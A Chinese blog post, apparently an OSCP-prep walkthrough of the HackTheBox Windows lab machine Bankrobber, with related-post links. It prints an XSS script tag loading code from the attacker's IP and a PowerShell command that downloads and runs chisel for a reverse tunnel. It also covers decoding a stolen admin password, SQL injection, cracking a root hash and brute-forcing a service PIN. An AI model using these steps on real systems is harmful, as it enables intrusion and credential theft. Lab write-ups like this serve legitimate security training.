OSCP备考_0x49_HackThBox靶机_Windows_Bankrobber

Ethan医生1周前靶场24

Bankrobber

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.109 (扫描TCP)

image.png

80存在apache,所以我们要关注php(特别关注)

443是一个https的apache,在80存在异常的时候,可能就是被跳转到https了

而后就是3306的MariaDB (unauthorized)

然后就是每次都会遇到的smb枚举

基本上我们在这个信息收集中获取的信息就这么多了



python3 -m http.server 80。  --本地开服务器让那边找你这个test.js

<script src="http://10.10.16.43/xss.js"></script>


image.png


然后将信息返回到服务器上

image.png


SG9wZWxlc3Nyb21hbnRpYw%3D%3D

SG9wZWxlc3Nyb21hbnRpYw==

解密后发现

admin/Hopelessromantic。

登入后发现存在SQL注入

image.png


image.png

成功获取 root 用户哈希值:F435725A173757E57BD36B09048B8B610FF4D0C4,通过网站破解md5值
破解网站:https://crackstation.net/


成功破解密码为Welkom1!

PHP代码审计

访问地址http://10.10.10.154/notes.txt发现这是 xampp,默认绝对路径为C:/xampp/htdocs






查看端口和进程发现bankv2.exe运行在本地的910端口,可以把端口转发出来:


# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 8000 --reverse

# target
powershell -c "wget 10.10.14.15:7777/chisel.exe -o c.exe"
c.exe client 10.10.14.15:8000 R:910:localhost:910


然后测试连接本机910端口,提示需要4位pin码:


bankv2

首先脚本爆破出来pin码是0021:


标签: OSCP

相关文章

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

OSCP备考_0x57_HackThBox靶机_Windows_Love

OSCP备考_0x57_HackThBox靶机_Windows_Love

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

OSCP备考_0x45_HackThBox靶机_Windows_ bounty

OSCP备考_0x45_HackThBox靶机_Windows_ bounty

OSCP备考_0x45_HackThBox靶机_Windows_ bountynmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.246.227&nb...

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。